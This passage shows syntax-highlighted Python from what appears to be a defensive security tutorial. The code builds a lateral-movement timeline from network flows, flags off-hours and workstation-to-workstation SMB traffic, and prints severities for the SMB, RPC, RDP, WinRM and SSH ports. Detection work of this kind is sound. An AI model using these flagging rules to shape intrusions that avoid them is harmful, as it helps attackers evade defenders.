</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hour </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    suspicion_flags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'OFF_HOURS'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Workstation-to-workstation SMB (no server name pattern)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">445</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'srv'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">lower</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'server'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">lower</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dc'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">lower</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    suspicion_flags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'WORKSTATION_TO_WORKSTATION_SMB'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            event </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">isoformat</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> src_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> src_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> src_mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> dst_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> dst_mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'protocol'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'TCP'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes_transferred'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'tcp_flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_account'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'account'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> matching_auth </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'UNKNOWN'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_pkg'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> matching_auth </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'UNKNOWN'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> matching_auth </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'UNKNOWN'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'suspicion_flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> suspicion_flags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'HIGH'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> suspicion_flags </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'INFO'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">print_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> high_only</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Print a readable attack timeline.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\\n\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">+</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"=\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">*</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">80</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"LATERAL MOVEMENT TIMELINE\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"=\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">*</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">80</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        port_names </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">445</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'SMB'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">135</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'RPC'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">3389</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'RDP'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5985</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'WinRM'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">22</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'SSH'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> event </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> high_only </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">!=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'HIGH'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            port_str </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> port_names</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">str</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            mb </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">round</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes_transferred'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">1048576</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            flags_str </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">', '</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">join</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'suspicion_flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'suspicion_flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'none'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"\\n[</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">] </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" 